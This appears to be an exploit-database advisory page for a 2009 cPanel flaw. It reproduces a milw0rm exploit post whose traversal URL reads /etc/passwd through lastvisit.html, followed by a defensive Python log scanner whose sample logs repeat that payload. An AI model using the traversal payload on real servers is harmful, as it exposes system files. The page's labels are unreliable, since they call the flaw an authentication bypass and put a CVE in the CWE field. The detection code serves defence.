Vendor: cPanel
By: Black Dream
CVSS: 9.3 (HIGH)
Category: Authentication Bypass
CWE: 287
Product Name: cPanel
Affected Version From: cPanel 11.25.0
Affected Version To: cPanel 11.25.2
Patch Exists: YES
Related CWE: CVE-2009-1234
CPE: a:cpanel:cpanel
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

CPANEL USER BYPASS

A vulnerability in cPanel 11.25.0 through 11.25.2 allows an attacker to bypass authentication and gain access to the cPanel interface. The flaw lies in the authentication process: a specially crafted request to the cPanel interface (the request is shown in the Exploit-DB data below) is accepted without valid credentials, giving the attacker access to the interface.

Mitigation:

The vendor has released a patch to address this vulnerability.

Exploit-DB raw data:

+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     CPANEL USER BYPASS                                            |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: CPANEL                                                                   |
| Home...: http://CPANEL.NET                                                        |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| [+] Exploit:                                                                      |
|                                                                                   |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd 
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] user[s]                                             |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|

+===================================================================================+
|                                                                                   |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0       |
|                 Linux-D3v1L  And All #sec-r1z memb3rz!!!!                         |
+===================================================================================+
E0D|F

# milw0rm.com [2009-06-29]
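As an added defensive example (not part of the advisory or of cPanel's own code), the following Python script scans access-log lines for requests to the lastvisit.html endpoint whose `domain` parameter is not a plain hostname, URL-decoding repeatedly so encoded traversal sequences are not missed. The log lines, client addresses and the hostname allow-list are constructed assumptions; the same allow-list check is what a handler should apply to `domain` before using it in a file path.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (not from the advisory); the second and third
# requests mirror the advisory's traversal, plain and double URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jun/2009:10:01:02 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=example.com HTTP/1.1" 200 1532
203.0.113.9 - - [29/Jun/2009:10:02:17 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=../../../../../../../../etc/passwd HTTP/1.1" 200 2044
203.0.113.9 - - [29/Jun/2009:10:02:41 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 2044
198.51.100.2 - - [29/Jun/2009:10:03:00 +0000] "GET /frontend/x3/index.html HTTP/1.1" 200 900
"""

# Common Log Format: client, ident, user, [timestamp], "request line", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Allow-list for `domain`: dot-separated labels of letters, digits and hyphens.
# Slashes, '..' runs and NUL bytes (encoded or not) all fail this check.
HOSTNAME_RE = re.compile(r'^[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*$')

def is_valid_domain(value: str) -> bool:
    """True only if `value` looks like a hostname and is safe to use in a path."""
    return bool(HOSTNAME_RE.match(value))

def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded traversal (%252e%252e) is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal_attempts(log_text: str) -> list:
    """Return (ip, status, decoded domain) for lastvisit.html requests whose `domain`
    is not a plain hostname; a 200 on such a request means the traversal was served."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/stats/lastvisit.html"):
            continue
        # parse_qs decodes one layer of percent-encoding; decode_fully handles the rest.
        for raw in parse_qs(url.query, keep_blank_values=True).get("domain", []):
            value = decode_fully(raw)
            if not is_valid_domain(value):
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits
```

Running `find_traversal_attempts(SAMPLE_LOG)` flags the two requests from 203.0.113.9 and ignores the legitimate `example.com` lookup and the unrelated index page.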